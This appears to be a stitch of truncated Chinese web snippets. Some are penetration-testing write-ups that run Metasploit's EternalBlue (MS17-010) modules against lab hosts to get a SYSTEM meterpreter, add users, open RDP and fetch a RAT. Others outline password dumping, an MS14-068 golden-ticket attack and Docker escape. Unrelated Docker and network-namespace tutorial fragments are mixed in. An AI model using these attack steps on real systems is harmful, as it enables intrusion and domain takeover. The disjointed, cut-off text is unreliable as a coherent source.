6.永恒之蓝(ms17-010)常用模块 扫描模块 auxiliary/scanner/smb/smb_ms17_010 攻击模块 auxiliary/amin/smb/ms17_010_command 该模块是所有利用方法中最为稳定的,并且不会被杀软拦截等。可以直接通过命令添加用户、开启3389、下载Rat等操作。 影响版本:windows server 2003、windows xp – exploit/windows/smb/ms...
放部分关键命令,proxychains nmap -Pn -sT 192.168.33.33 --open 有445端口,上永恒之蓝,但是发现无法接连到shell,于是使用另外一个模块admin/smb/ms17_010_command msf6 > use auxiliary/admin/smb/ms17_010_command msf6 auxiliary(admin/smb/ms17_010_command) > set command whoami command => whoami msf...
64 bytes from test-web02.mynet (172.18.0.3): icmp_seq=1 ttl=64 time=0.029 ms 64 bytes from test-web02.mynet (172.18.0.3): icmp_seq=2 ttl=64 time=0.061 ms (3)设置容器的IP地址 使用--network选项启动容器连接自定义网络时,可以使用--ip或--ip6选项明确指定分配给该网络容器的ip地址。 使...
之前提到过130开了53端口初步判断为域控,所以这里先从129这台主机入手 use exploit/windows/ smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp set rhosts 192.168.183.129 run 这里看到永恒之蓝直接打成功了返回了一个SYSTEM权限的meterpreter,这里先进行一个进程迁移,从x86迁移到x64的进程里...
64 bytes from 192.168.1.3: icmp_seq=1 ttl=64 time=0.082 ms 通过上面的实验,我们验证了可以使用linux bridge来将多个namespace连接到同一个二层网络中。在分配IP地址的时候,我们只为veth在namespace中那一端的虚拟网卡分配了地址,而没有为加入bridge那一端分配地址。这是因为bridge是工作在二层上的,只会...
后续继续进行内网信息搜集,发现了ubuntu双网卡,并且存在域环境,可以使用fscan进行扫描一波,域成员和域控都存在ms17-010永恒之蓝,使用msf直接win7打ms17-010,拿下域成员;切换域成员session抓密码,利用ms14-068等域提权拿到黄金票据,攻击拿下域控。 后记
继续往下看,还有几个ip,但是不是eth,而且这里有三个ip,根据上面有三个不同的环境,那么可以判断应该是用的docker。那么我们无论使用3个环境的哪个环境拿shell都只是一个docker容器里面的shell,并不是真正ubuntu的shell,所以这里我们还需要进行docker逃逸到ubuntu ...
docker run --rm -it -p 443:443 -v ~/.msf4:/root/.msf4 -v /tmp/msf:/tmp/data remnux/metasploit, 等待,等待,等待, 会自动进入shell, 输入msfconsole,就可以用Metasploit了, 拿ms17_010练习一下,自从永恒之蓝漏洞出来,ms17_010这个exploit已经成为Metasploit必备练习了, ...
-i, --interactive=false 打开STDIN,用于控制台交互 -t, --tty=false 分配tty设备,该可以支...
首先,大家需要明确一点,Docker容器不是虚拟机。2014年,当我第一次接触Docker的时候,我把它比做一种...